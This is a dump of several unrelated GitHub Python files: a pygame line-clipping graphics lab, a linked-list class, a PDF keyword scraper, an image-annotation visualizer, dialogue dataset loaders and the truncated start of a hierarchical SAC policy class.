set_button(t,x,y,xs=300,ys=25):\r\n    return pygame_gui.elements.UIButton(relative_rect=set_rect(x,y,xs,ys),text=t,manager=manager)\r\n\r\ndef init_ui() -> dict[str,UIElement]:\r\n    ui:dict[str,UIElement] = {\r\n        \"DRAW_POLYGON\":set_button('draw polygon',300,0),\r\n        \"DRAW_RECTANGLE\":set_button('draw rectangle',300,25),\r\n        \"OXPC\":set_slider(300,50),\"OXPCTB\":set_textbox(50,50),\r\n        \"OYPC\":set_slider(300,75),\"OYPCTB\":set_textbox(50,75),\r\n        \"DRAW_LINE\":set_button('draw segment',300,100),\r\n        \"OX1LC\":set_slider(300,125),\"OX1LCTB\":set_textbox(50,125),\r\n        \"OY1LC\":set_slider(300,150),\"OY1LCTB\":set_textbox(50,150),\r\n        \"OX2LC\":set_slider(300,175),\"OX2LCTB\":set_textbox(50,175),\r\n        \"OY2LC\":set_slider(300,200),\"OY2LCTB\":set_textbox(50,200),\r\n        \"CUT_LINE_1\":set_button('clip segment',300,225),\r\n        \"CUT_LINE_2\":set_button('clip segment (method 1)',300,225),\r\n        \"CUT_LINE_3\":set_button('clip segment (method 2)',300,250),\r\n    }\r\n    ui[\"CUT_LINE_1\"].hide()\r\n    ui[\"CUT_LINE_2\"].hide()\r\n    ui[\"CUT_LINE_3\"].hide()\r\n    return ui\r\n\r\ndef chain_ui():\r\n    def tb_n_sl(sl,tb,v):\r\n        all_ui_elements[sl].set_current_value(float(v))\r\n        all_ui_elements[tb].set_text(str(v))\r\n    tb_n_sl(\"OXPC\",\"OXPCTB\",polygon_coords[0]);tb_n_sl(\"OYPC\",\"OYPCTB\",polygon_coords[1])\r\n    tb_n_sl(\"OX1LC\",\"OX1LCTB\",line_coords[0][0]);tb_n_sl(\"OY1LC\",\"OY1LCTB\",line_coords[0][1])\r\n    tb_n_sl(\"OX2LC\",\"OX2LCTB\",line_coords[1][0]);tb_n_sl(\"OY2LC\",\"OY2LCTB\",line_coords[1][1])\r\n\r\ninit()\r\nmanager = pygame_gui.UIManager((DIS_WIDTH, DIS_HEIGHT))\r\nwindow_surface=display.set_mode((DIS_WIDTH,DIS_HEIGHT))\r\nbackground = pygame.Surface((DIS_WIDTH, DIS_HEIGHT))\r\nclock = time.Clock()\r\ngame_over=False\r\ntime_delta = 0\r\nall_ui_elements = init_ui()\r\nrender_pipe:list[dict] = []\r\nline_coords = [[0,0],[0,0]]\r\npolygon_coords = [0,0]\r\nrender_pipe.append({});render_pipe.append({})\r\nrender_pipe.append({});render_pipe.append({})\r\nrender_pipe[1].update({\"decart\":partial(decart)})\r\n\r\n\r\ndef draw_vect_line(dis,col,srtp,endp):draw.line(dis,col,srtp(),endp())\r\n\r\ndef draw_vect_polygon(dis,col,model,cntr):\r\n    draw.polygon(dis,col,[[x[0]+cntr()[0],-x[1]+cntr()[1]] for x in model],width=1)\r\n\r\ndef draw_cut_line_1(dis,fcol,scol,srtp,endp,model,pcntr):\r\n    srtp,endp,pcntr = ToScreenCoords(srtp()),ToScreenCoords(endp()),ToScreenCoords(pcntr())\r\n    polygon = [[x[0]+pcntr[0],x[1]+pcntr[1]] for x in model]\r\n    x0,y0,t0,t1 = endp[0]-srtp[0],endp[1]-srtp[1],0,1\r\n    for p1,p2 in zip(list(reversed(polygon)),list(reversed(polygon))[1:]+list(reversed(polygon))[:1]):\r\n        (x1,y1),(x2,y2) = p1,p2\r\n        nx,ny = y1-y2,x2-x1  # normal vector to the edge\r\n        p = nx*x0 + ny*y0  # dot product of the vectors (Dck)\r\n        wx,wy = srtp[0]-x1,srtp[1]-y1\r\n        q = nx*wx+ny*wy  # Wck\r\n        if p != 0:\r\n            t = -q/p\r\n            if p > 0:\r\n                if t > 1:\r\n                    draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n                    return\r\n                else:t0 = max(t,t0)\r\n            else:\r\n                if t < 0:\r\n                    draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n                    return\r\n                else:t1 = min(t,t1)\r\n        else:\r\n            if q < 0:\r\n                draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n                return\r\n    if t0 <= t1:\r\n        fp = [srtp[0]+t0*(endp[0]-srtp[0]),srtp[1]+t0*(endp[1]-srtp[1])]\r\n        sp = [srtp[0]+t1*(endp[0]-srtp[0]),srtp[1]+t1*(endp[1]-srtp[1])]\r\n        draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(fp))\r\n        draw.line(dis,fcol,ToWorldCoords(sp),ToWorldCoords(endp))\r\n        draw.line(dis,scol,ToWorldCoords(fp),ToWorldCoords(sp))\r\n    else:\r\n        draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n\r\ndef draw_cut_line_2(dis,fcol,scol,srtp,endp,model,pcntr):\r\n    srtp,endp,pcntr = ToScreenCoords(srtp()),ToScreenCoords(endp()),ToScreenCoords(pcntr())\r\n    pol = [[x[0]+pcntr[0],x[1]+pcntr[1]] for x in model]\r\n    x_min,y_min,x_max,y_max = pol[0][0],pol[0][1],pol[0][0],pol[0][1]\r\n    for x,y in pol:x_min,y_min,x_max,y_max = min(x_min,x), min(y_min,y),max(x_max,x),max(y_max,y)\r\n    def code(p):\r\n        return int(\r\n            str(int(p[1] > y_max))+  # 8 TOP\r\n            str(int(p[1] < y_min))+  # 4 BOT\r\n            str(int(p[0] > x_max))+  # 2 RIGHT\r\n            str(int(p[0] < x_min))   # 1 LEFT\r\n            ,2)\r\n\r\n    LEFT,RIGHT,BOT,TOP = 1,2,4,8\r\n    fp,sp,fpc,spc = srtp,endp,code(srtp),code(endp)\r\n    print(fpc,spc)\r\n    while(fpc | spc):\r\n        if (fpc & spc):draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp));return\r\n        # pick the point with a non-zero code\r\n        nnpc,nnp = (fpc,fp) if fpc else (spc,sp)\r\n        dx,dy = fp[0] - sp[0],fp[1] - sp[1]\r\n        if (nnpc & LEFT):nnp = [x_min,nnp[1] + dy * (x_min - nnp[0]) / dx]\r\n        elif (nnpc & RIGHT):nnp = [x_max,nnp[1] + dy * (x_max - nnp[0]) / dx]\r\n        elif (nnpc & BOT):nnp = [nnp[0]+dx * (y_min - nnp[1]) / dy,y_min]\r\n        elif (nnpc & TOP):nnp = [nnp[0]+dx * (y_max - nnp[1]) / dy,y_max]\r\n        if (nnpc == fpc):fp,fpc = nnp,code(nnp)\r\n        else:sp,spc = nnp,code(nnp)\r\n\r\n    draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(fp))\r\n    draw.line(dis,scol,ToWorldCoords(fp),ToWorldCoords(sp))\r\n    draw.line(dis,fcol,ToWorldCoords(sp),ToWorldCoords(endp))\r\n\r\ndef draw_cut_line_3(dis,fcol,scol,srtp,endp,model,pcntr):\r\n    srtp,endp,pcntr = ToScreenCoords(srtp()),ToScreenCoords(endp()),ToScreenCoords(pcntr())\r\n    pol = [[x[0]+pcntr[0],x[1]+pcntr[1]] for x in model]\r\n    x_min,y_min,x_max,y_max = pol[0][0],pol[0][1],pol[0][0],pol[0][1]\r\n    for x,y in pol:x_min,y_min,x_max,y_max = min(x_min,x), min(y_min,y),max(x_max,x),max(y_max,y)\r\n    def code(p):\r\n        return int(\r\n            str(int(p[1] > y_max))+  # 8 TOP\r\n            str(int(p[1] < y_min))+  # 4 BOT\r\n            str(int(p[0] > x_max))+  # 2 RIGHT\r\n            str(int(p[0] < x_min))   # 1 LEFT\r\n            ,2)\r\n\r\n    ACCURACY = 10\r\n\r\n    def check(a,b):  # returns either None or two points\r\n        ac,bc = code(a),code(b)\r\n        if(ac | bc):\r\n            if(ac & bc):return None\r\n            m = [(a[0]+b[0])/2,(a[1]+b[1])/2]\r\n            if (abs(a[0]-b[0]) < ACCURACY) and (abs(a[1]-b[1]) < ACCURACY):return [a,b]\r\n            amv,mbv = check(a,m),check(m,b)\r\n            if amv != None:\r\n                if mbv != None:return [amv[0],mbv[1]]\r\n                else:return amv\r\n            else:return mbv\r\n        else:return [a,b]\r\n\r\n    fsv = check(srtp,endp)\r\n    if fsv != None:\r\n        draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(fsv[0]))\r\n        draw.line(dis,scol,ToWorldCoords(fsv[0]),ToWorldCoords(fsv[1]))\r\n        draw.line(dis,fcol,ToWorldCoords(fsv[1]),ToWorldCoords(endp))\r\n    else:\r\n        draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n    return\r\n\r\n\r\nwhile not game_over:\r\n    background.fill(0)\r\n    time_delta = clock.tick(60)/1000.0\r\n\r\n    for event in pygame.event.get():\r\n        if event.type==pygame.QUIT:\r\n            game_over=True\r\n\r\n        if event.type == pygame_gui.UI_HORIZONTAL_SLIDER_MOVED:\r\n            if event.ui_element == all_ui_elements[\"OXPC\"]:polygon_coords[0] = int(event.value)\r\n            if event.ui_element == all_ui_elements[\"OYPC\"]:polygon_coords[1] = int(event.value)\r\n            if event.ui_element == all_ui_elements[\"OX1LC\"]:line_coords[0][0] = int(event.value)\r\n            if event.ui_element == all_ui_elements[\"OY1LC\"]:line_coords[0][1] = int(event.value)\r\n            if event.ui_element == all_ui_elements[\"OX2LC\"]:line_coords[1][0] = int(event.value)\r\n            if event.ui_element == all_ui_elements[\"OY2LC\"]:line_coords[1][1] = int(event.value)\r\n\r\n        if event.type == pygame_gui.UI_BUTTON_PRESSED:\r\n            if event.ui_element == all_ui_elements[\"DRAW_POLYGON\"]:\r\n                render_pipe[2].clear()\r\n                render_pipe[2].update({\"draw.polygon\":partial(\r\n                    draw_vect_polygon,background,GREEN,POLYGON,partial(ToWorldCoords,polygon_coords))})\r\n                all_ui_elements[\"CUT_LINE_1\"].show()\r\n                all_ui_elements[\"CUT_LINE_2\"].hide();all_ui_elements[\"CUT_LINE_3\"].hide()\r\n            if event.ui_element == all_ui_elements[\"DRAW_RECTANGLE\"]:\r\n                render_pipe[2].clear()\r\n                render_pipe[2].update({\"draw.rectangle\":partial(\r\n                    draw_vect_polygon,background,GREEN,RECTANGLE,partial(ToWorldCoords,polygon_coords))})\r\n                all_ui_elements[\"CUT_LINE_1\"].hide()\r\n                all_ui_elements[\"CUT_LINE_2\"].show();all_ui_elements[\"CUT_LINE_3\"].show()\r\n            if event.ui_element == all_ui_elements[\"DRAW_LINE\"]:\r\n                render_pipe[3].clear()\r\n                render_pipe[3].update({\"draw.line\":partial(\r\n                    draw_vect_line,background,GREEN,partial(ToWorldCoords,line_coords[0]),\r\n                    partial(ToWorldCoords,line_coords[1]))})\r\n            if event.ui_element == all_ui_elements[\"CUT_LINE_1\"]:\r\n                render_pipe[3].clear()\r\n                render_pipe[3].update({\"draw.cut_line_1\":partial(\r\n                    draw_cut_line_1,background,RED,GREEN,partial(ToWorldCoords,line_coords[0]),\r\n                    partial(ToWorldCoords,line_coords[1]),POLYGON,partial(ToWorldCoords,polygon_coords))})\r\n            if event.ui_element == all_ui_elements[\"CUT_LINE_2\"]:\r\n                render_pipe[3].clear()\r\n                render_pipe[3].update({\"draw.cut_line_2\":partial(\r\n                    draw_cut_line_2,background,RED,GREEN,partial(ToWorldCoords,line_coords[0]),\r\n                    partial(ToWorldCoords,line_coords[1]),RECTANGLE,partial(ToWorldCoords,polygon_coords))})\r\n            if event.ui_element == all_ui_elements[\"CUT_LINE_3\"]:\r\n
render_pipe[3].clear()\r\n render_pipe[3].update({\"draw.cut_line_3\":partial(\r\n draw_cut_line_3,background,RED,GREEN,partial(ToWorldCoords,line_coords[0]),\r\n partial(ToWorldCoords,line_coords[1]),RECTANGLE,partial(ToWorldCoords,polygon_coords))})\r\n manager.process_events(event)\r\n chain_ui()\r\n manager.update(time_delta)\r\n for layer in render_pipe:\r\n for k in layer:layer[k]()\r\n window_surface.blit(background, (0, 0))\r\n manager.draw_ui(window_surface)\r\n display.update()\r\npygame.quit()\r\nquit()","repo_name":"katerinArtem/computer_graphics","sub_path":"lab4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25355704668","text":"class Node:\r\n \"\"\"Data container and pointer initiator.\"\"\"\r\n\r\n def __init__(self, data=None):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass LinkedList:\r\n \"\"\"Create all the methods we need to operationalize linked list like:\r\n - Add to head, remove from head, reset head, move forward, etc.\r\n \"\"\"\r\n def __init__(self):\r\n self._head = None\r\n self._curr = None\r\n\r\n def add_to_head(self, data):\r\n new_node = Node(data)\r\n new_node.next = self._head\r\n self._head = new_node\r\n self.reset_to_head()\r\n\r\n def remove_from_head(self):\r\n if self._head is None:\r\n return None\r\n ret_val = self._head.data\r\n self._head = self._head.next\r\n self.reset_to_head()\r\n return ret_val\r\n\r\n def reset_to_head(self):\r\n self._curr = self._head\r\n if self._curr is None:\r\n return None\r\n else:\r\n return self._curr.data\r\n\r\n def move_forward(self):\r\n if self._curr is None:\r\n return None\r\n else:\r\n self._curr = self._curr.next\r\n if self._curr is None:\r\n return None\r\n else:\r\n return self._curr.data\r\n\r\n def add_after_curr(self, data):\r\n if self._curr is None:\r\n self.add_to_head(data)\r\n return\r\n new_node = Node(data)\r\n new_node.next = self._curr.next\r\n self._curr.next = new_node\r\n\r\n def remove_after_curr(self):\r\n if self._curr is None or self._curr.next is None:\r\n return None\r\n ret_val = self._curr.next.data\r\n self._curr.next = self._curr.next.next\r\n return ret_val\r\n\r\n def find(self, value):\r\n curr_pos = self._head\r\n while curr_pos is not None:\r\n if curr_pos.data == value:\r\n return curr_pos.data\r\n curr_pos = curr_pos.next\r\n return None\r\n\r\n def delete(self, value):\r\n self.reset_to_head()\r\n if self._curr is None:\r\n return None\r\n if self._curr.data == value:\r\n return self.remove_from_head()\r\n while self._curr.next is not None:\r\n if self._curr.next.data == value:\r\n ret_val = self.remove_after_curr()\r\n self.reset_to_head()\r\n return ret_val\r\n self._curr = self._curr.next\r\n self.reset_to_head()\r\n return None\r\n\r\n def __iter__(self):\r\n self._curr = self._head\r\n return self\r\n\r\n def __next__(self):\r\n if self._curr is None:\r\n raise StopIteration\r\n ret_val = self._curr.data\r\n self.move_forward()\r\n return ret_val","repo_name":"SebastianOpiyo/neural-networks","sub_path":"exercise_A/utils/linkedlists.py","file_name":"linkedlists.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25177718065","text":"import PyPDF2\nimport textract\n\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n\n\nfile_path = 
'/home/sriteja/PycharmProjects/NirdProjms_Scrapping/files/2017/Volume 36, Issue 1, January-March 2017/112698-255599-1-SM.pdf'\n\npdfFileObj = open(file_path,'rb')\n\npdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n\nnum_pages = pdfReader.numPages\n\ncount = 0\ntext = \"\"\n\nwhile count < num_pages:\n pageObj = pdfReader.getPage(count)\n count +=1\n text += pageObj.extractText()\n\nif text == \"\":\n text = textract.process(file_path, method='tesseract', language='eng')\n\ntokens = word_tokenize(text)\n\npunctuations = ['(',')',';',':','[',']',',']\n\nstop_words = stopwords.words('english')\nkeywords = [word for word in tokens if not word in stop_words and not word in punctuations]","repo_name":"sriteja777/web_scraping","sub_path":"NirdProjms_Scrapping/pdf_scrap.py","file_name":"pdf_scrap.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22132164583","text":"import os\nimport cv2\n\nimage_name = 'TI1K_IMAGE_0123.jpg'\nfolder_name = '../train/'\nannotation_file = '../annotation/label.txt'\n\nf = open(annotation_file)\nlines = f.readlines()\nf.close()\n\nfiles = os.listdir(folder_name)\n\nfor line in lines:\n line = line.strip().split()\n name = line[0]\n if image_name == name:\n print(name)\n line = line[1:]\n for i in range(0, len(line), 2):\n line[i] = int(float(line[i]) * 640)\n line[i + 1] = int(float(line[i + 1]) * 480)\n image = cv2.imread(folder_name + name)\n image = cv2.resize(image, (640, 480))\n image = cv2.rectangle(image, (line[0], line[1]), (line[2], line[3]), (255, 0, 0), 4)\n image = cv2.circle(image, (line[4], line[5]), 12, (0, 0, 255), -10)\n image = cv2.circle(image, (line[6], line[7]), 12, (0, 255, 0), -10)\n cv2.imshow('Visualize Image', image)\n if cv2.waitKey(0) & 0xff == 27:\n break\n","repo_name":"MahmudulAlam/TI1K-Dataset","sub_path":"scripts/visualize_dataset.py","file_name":"visualize_dataset.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"31585281924","text":"import zipfile\nimport json\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport re\nimport copy\nimport random\nimport glob\nfrom functools import partial\n\nimport tqdm\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom transformers import BertTokenizer, BlenderbotTokenizer, RobertaTokenizerFast, BertTokenizerFast\n\n\ndef text_words(t, filter_disfluency=True):\n \"\"\"\n Source: https://github.com/NathanDuran/Switchboard-Corpus\n Tokenized version of the utterance; filter_disfluency=True\n will remove the special utterance notation to make the results\n look more like printed text. The tokenization itself is just\n spitting on whitespace, with no other simplification. The\n return value is a list of str instances.\n \"\"\"\n # t = self.text\n if filter_disfluency:\n t = re.sub(r\"([+/\\}\\[\\]]|\\{\\w)\", \"\", t)\n return ' '.join(re.split(r\"\\s+\", t.strip()))\n#e.g. text_words(swda_data['train'][0]['text'])\n\nclass SWDA_NathanDuran(Dataset):\n \"\"\"\n TODO: Implement this class. 
Data in data/nathanduran_swda/\n \"\"\"\n pass\n\n\ndef split_dataset_train_valid(dataset, train_valid_ratio=0.9):\n split = dataset.data.train_test_split(test_size=1-train_valid_ratio)\n train = TaskDataset(dataset.task_name, dataset.tokenizer, split, dataset.keys, dataset.num_inputs,\n dataset.data_path, split=\"train\")\n valid = TaskDataset(dataset.task_name, dataset.tokenizer, split, dataset.keys, dataset.num_inputs,\n dataset.data_path, split=\"test\")\n print(f\"Splitting data: {len(dataset)} -> train {len(train)}, valid {len(valid)}\")\n return train, valid\n\n\ndef tok_n_pad(tokenizer, text, max_len, cls_token_id, left_truncate=False):\n input_ids = tokenizer.encode(text, add_special_tokens=False) # remove from tokens\n txt_len = len(input_ids)\n attn_mask = [0] * txt_len\n if txt_len < max_len:\n input_ids = input_ids + [tokenizer.pad_token_id] * (max_len - txt_len - 1) # remove tail / pad tail\n attn_mask = attn_mask + [1] * (max_len - txt_len - 1)\n else:\n if left_truncate:\n input_ids = input_ids[txt_len - max_len + 1:]\n attn_mask = attn_mask[txt_len - max_len + 1:]\n else:\n input_ids = input_ids[:max_len - 1]\n attn_mask = attn_mask[:max_len - 1]\n\n input_ids = [cls_token_id] + input_ids\n attn_mask = [0] + attn_mask\n\n text = torch.tensor(input_ids, dtype=torch.long).view(max_len)\n attn_mask = torch.tensor(attn_mask, dtype=torch.bool).view(max_len)\n return attn_mask, text\n\n\ndef load_dailydial_pp(split, data_path, eou_token):\n # Sample -> {\"context\": \"\", \"response\": \"\", \"label\": \"\"}\n is_adversarial = False\n is_full = False\n if \"/\" in split:\n split, mode = split.split(\"/\")\n if mode == \"adv\":\n is_adversarial = True\n elif mode == \"full\":\n is_full = True\n\n data = []\n with open(f\"{data_path}/dailydialog_pp/dataset/{split}.json\") as f:\n for line in f:\n sample = json.loads(line)\n con = f\" {eou_token} \".join(sample[\"context\"])\n # Positive\n for pos in sample[\"positive_responses\"]:\n data.append({\"context\": con, \"response\": pos, \"label\": 1})\n # Negative\n if is_adversarial:\n for adv in sample[\"adversarial_negative_responses\"]:\n data.append({\"context\": con, \"response\": adv, \"label\": 0})\n elif is_full:\n for adv in sample[\"adversarial_negative_responses\"]:\n data.append({\"context\": con, \"response\": adv, \"label\": 0})\n for neg in sample[\"random_negative_responses\"]:\n data.append({\"context\": con, \"response\": neg, \"label\": 0})\n else:\n for neg in sample[\"random_negative_responses\"]:\n data.append({\"context\": con, \"response\": neg, \"label\": 0})\n return data\n\n\ndef load_e_intent(split, data_path):\n data = []\n with open(f\"{data_path}/e_intents/datasets/train_data/{split}.txt\") as f:\n for line in f:\n label, _, text = line.split(\" \", 2)\n data.append({\"context\": text.strip(), \"label\": int(label.strip())})\n return data\n\n\ndef load_dnli(split, data_path):\n data = []\n label_map ={\n \"negative\": 0,\n \"positive\": 1,\n \"neutral\": 2\n }\n with open(f\"{data_path}/dnli/dialogue_nli/dialogue_nli_{split}.jsonl\") as f:\n f = json.loads(f.read())\n for line in f:\n s1 = line['sentence1']\n s2 = line['sentence2']\n label = label_map[line[\"label\"]]\n data.append({\"sentence1\": s1.strip(), \"sentence2\": s2.strip(), \"label\": label})\n return data\n\nclass TaskDataset(Dataset):\n def __init__(self, task_name, tokenizer, hf_dataset, keys, num_inputs, data_path, split='train', max_len=200, encode_together=False):\n if isinstance(tokenizer, BlenderbotTokenizer):\n self.CLS = 
tokenizer.bos_token_id\n self.EOU = \"__eou__\"\n elif isinstance(tokenizer, BertTokenizer) or isinstance(tokenizer, BertTokenizerFast):\n self.CLS = tokenizer.cls_token_id\n self.EOU = \"__eou__\"\n elif isinstance(tokenizer, RobertaTokenizerFast):\n self.CLS = tokenizer.cls_token_id\n self.EOU = tokenizer.sep_token\n else:\n raise Exception(f\"Reached Hell: Tokenizer not supported {tokenizer}\")\n\n if task_name.split(\"/\")[0] == \"dd++\":\n data = load_dailydial_pp(split, data_path, self.EOU)\n elif task_name == \"e/intent\":\n data = load_e_intent(split, data_path)\n elif task_name == \"dnli\":\n data = load_dnli(split, data_path)\n else:\n data = hf_dataset[split]\n self.task_name = task_name\n self.data = data\n self.max_len = max_len\n self.tokenizer = tokenizer\n self.keys = keys\n self.num_inputs = num_inputs\n self.data_path = data_path\n self.encode_together = encode_together\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n entry = self.data[index]\n if self.task_name == \"swda\":\n text = text_words(entry[self.keys[\"input_1\"]])\n else:\n text = entry[self.keys[\"input_1\"]]\n\n if self.encode_together:\n text = text + f\" {self.EOU} \" + entry[self.keys[\"input_2\"]]\n attn_mask, text = tok_n_pad(self.tokenizer, text, max_len=self.max_len, cls_token_id=self.CLS, left_truncate=True)\n\n label = int(entry[self.keys[\"label\"]])\n\n if self.num_inputs == 2 and not self.encode_together:\n resp = entry[self.keys[\"input_2\"]]\n attn_mask, resp = tok_n_pad(self.tokenizer, resp, max_len=self.max_len, cls_token_id=self.CLS)\n\n # input_ids = [1] + input_ids # append token - CLS for blenderbot\n # # TODO: Verify this next line\n # attn_mask = [0] + attn_mask # unmask the [CLS]\n\n # label = torch.tensor(label, dtype=torch.int64).view(1)\n\n if self.num_inputs == 2 and not self.encode_together:\n return text, resp, label\n else:\n return text, label\n\n\nclass RetrievalDatasetCLF(Dataset):\n def __init__(self, task_name, num_neg_samples, split, data_root, tokenizer, ctx_max_len=200, rsp_max_len=50, encode_together=False):\n if task_name in [\"mutual\", \"mutual_plus\"]:\n self.num_neg_samples = num_neg_samples if split != \"test\" else -1\n else:\n self.num_neg_samples = num_neg_samples\n self.task_name = task_name\n self.ctx_max_len = ctx_max_len\n self.rsp_max_len = rsp_max_len\n self.num_classes = 2\n self.tokenizer = tokenizer\n self.encode_together = encode_together\n\n if isinstance(tokenizer, BlenderbotTokenizer):\n self.CLS = tokenizer.bos_token_id\n self.EOU = \"__eou__\"\n elif isinstance(tokenizer, BertTokenizer) or isinstance(tokenizer, BertTokenizerFast):\n self.CLS = tokenizer.cls_token_id\n self.EOU = \"__eou__\"\n elif isinstance(tokenizer, RobertaTokenizerFast):\n self.CLS = tokenizer.cls_token_id\n self.EOU = tokenizer.sep_token\n else:\n raise Exception(f\"Reached Hell: Tokenizer not supported {tokenizer}\")\n\n # Actual data loading\n self.split = split\n self.data = []\n if self.task_name in [\"mutual\", \"mutual_plus\"]:\n if split == \"validation\":\n split = \"dev\"\n # self.con = []\n # self.pos = []\n # self.neg = []\n with zipfile.ZipFile(f\"{data_root}/mutual.zip\") as data_zip:\n pattern = rf\"MuTual-master/data/{task_name}/{split}/.*.txt\"\n rep = re.compile(pattern)\n print(rep)\n all_files = data_zip.namelist()\n fList = [x for x in all_files if rep.match(x)]\n\n for fi in tqdm.tqdm(fList, desc=f\"LOADING({task_name}:{split})\"):\n with data_zip.open(fi) as fh:\n obj = json.load(fh)\n # Preprocessing\n # Remove the m: / 
f: speaker tags\n speaker_regex = re.compile(r\" *[mf] *: *\", flags=re.IGNORECASE)\n obj[\"article\"] = f\" {self.EOU} \".join(speaker_regex.split(obj['article'])[1:])\n temp = []\n for opt in obj['options']:\n temp.append(speaker_regex.sub(\"\", opt))\n obj[\"options\"] = temp\n\n assert len(obj['options']) == 4\n if split != \"test\":\n ans = ord(obj['answers']) - ord('A')\n for x_index, x in enumerate(obj[\"options\"]):\n if x_index == ans:\n self.data.append((obj[\"article\"], x, 1))\n else:\n self.data.append((obj[\"article\"], x, 0))\n else:\n for x in obj[\"options\"]:\n self.data.append((obj[\"article\"], x, -1))\n elif self.task_name in [\"paa\"]:\n if split == \"validation\":\n split = \"dev\"\n # self.con = []\n # self.pos = []\n # self.neg = []\n path = f\"{data_root}/PAA_downstream/{split}.jsonl\"\n with open(path) as fh:\n for fi in fh:\n obj = json.loads(fi)\n # Preprocessing\n # Remove the m: / f: speaker tags\n obj[\"article\"] = f\" {self.EOU} \".join(obj['context'])\n\n assert len(obj['options']) == 4\n ans = ord(obj['answers']) - ord('A')\n for x_index, x in enumerate(obj[\"options\"]):\n if x_index == ans:\n self.data.append((obj[\"article\"], x, 1))\n else:\n self.data.append((obj[\"article\"], x, 0))\n elif self.task_name == \"dstc7\":\n pass\n else:\n raise NotImplementedError(f\"Umm... What now? [{task_name} not found]\")\n\n def split_train_valid(self, train_valid_ratio):\n assert self.split != \"test\", \"Do not split test set in retrieval\"\n train = copy.deepcopy(self)\n valid = copy.deepcopy(self)\n\n # split\n divisor = (self.num_neg_samples + 1)\n K = int(train_valid_ratio*len(train) // divisor)\n K = int(K * divisor)\n train.data = train.data[:K]\n valid.data = valid.data[K:]\n\n print(f\"Splitting data: {len(self)} -> train {len(train)}, valid {len(valid)}\")\n return train, valid\n\n def __getitem__(self, index):\n context, candidate, label = self.data[index]\n if self.encode_together:\n context = context + f\" {self.EOU} \" + candidate\n _, context = tok_n_pad(self.tokenizer, context, max_len=self.ctx_max_len, cls_token_id=self.CLS,\n left_truncate=True)\n # _, candidate = tok_n_pad(self.tokenizer, candidate, max_len=self.rsp_max_len, cls_token_id=self.CLS)\n\n return context, label\n else:\n _, context = tok_n_pad(self.tokenizer, context, max_len=self.ctx_max_len, cls_token_id=self.CLS, left_truncate=True)\n _, candidate = tok_n_pad(self.tokenizer, candidate, max_len=self.rsp_max_len, cls_token_id=self.CLS)\n\n return context, candidate, label\n\n def __len__(self):\n return len(self.data)\n\n\nif __name__==\"__main__\":\n\n\n mname = 'facebook/blenderbot-3B'\n tokenizer = BlenderbotTokenizer.from_pretrained(mname)\n\n # mname = 'bert-base-uncased'\n # tokenizer = BertTokenizer.from_pretrained(mname)\n tokenizer.add_special_tokens({'sep_token': '__eou__'})\n\n \"\"\"SWDA\n \"\"\"\n # datas = SWDA()\n # dataload = DataLoader(datas, batch_size=8)\n\n \"\"\"Mutual\n \"\"\"\n data = RetrievalDatasetCLF(\"mutual_plus\", 3, \"train\", \"./data\", tokenizer)\n print(len(data))\n # dl = torch.utils.data.DataLoader(data, batch_size=10, shuffle=True)\n # for x in dl:\n # print(x)\n # break\n #\n # data = RetrievalDatasetCLF(\"mutual\", 3, \"validation\", \"./data\", tokenizer)\n # print(len(data))\n #\n # data = RetrievalDatasetCLF(\"mutual\", 3, \"test\", \"./data\", tokenizer)\n # print(len(data))\n # dl = torch.utils.data.DataLoader(data, batch_size=10)\n # for x in dl:\n # print(x)\n # 
break\n","repo_name":"bsantraigi/2022-DMI-Mirror","sub_path":"datautils/data_swda.py","file_name":"data_swda.py","file_ext":"py","file_size_in_byte":13715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7125663432","text":"\"\"\"SAC-compatible goal-conditioned hierarchical policy.\"\"\"\nimport numpy as np\n\nfrom hbaselines.goal_conditioned.base import GoalConditionedPolicy as \\\n BaseGoalConditionedPolicy\nfrom hbaselines.fcnet.sac import FeedForwardPolicy\n\n\nclass GoalConditionedPolicy(BaseGoalConditionedPolicy):\n \"\"\"SAC-compatible goal-conditioned hierarchical policy.\"\"\"\n\n def __init__(self,\n sess,\n ob_space,\n ac_space,\n co_space,\n buffer_size,\n batch_size,\n actor_lr,\n critic_lr,\n verbose,\n tau,\n gamma,\n use_huber,\n l2_penalty,\n model_params,\n target_entropy,\n num_levels,\n meta_period,\n intrinsic_reward_type,\n intrinsic_reward_scale,\n relative_goals,\n off_policy_corrections,\n hindsight,\n subgoal_testing_rate,\n cooperative_gradients,\n cg_weights,\n cg_delta,\n pretrain_worker,\n pretrain_path,\n pretrain_ckpt,\n total_steps,\n scope=None,\n env_name=\"\",\n num_envs=1):\n \"\"\"Instantiate the goal-conditioned hierarchical policy.\n\n Parameters\n ----------\n sess : tf.compat.v1.Session\n the current TensorFlow session\n ob_space : gym.spaces.*\n the observation space of the environment\n ac_space : gym.spaces.*\n the action space of the environment\n co_space : gym.spaces.*\n the context space of the environment\n buffer_size : int\n the max number of transitions to store\n batch_size : int\n SGD batch size\n actor_lr : float\n actor learning rate\n critic_lr : float\n critic learning rate\n verbose : int\n the 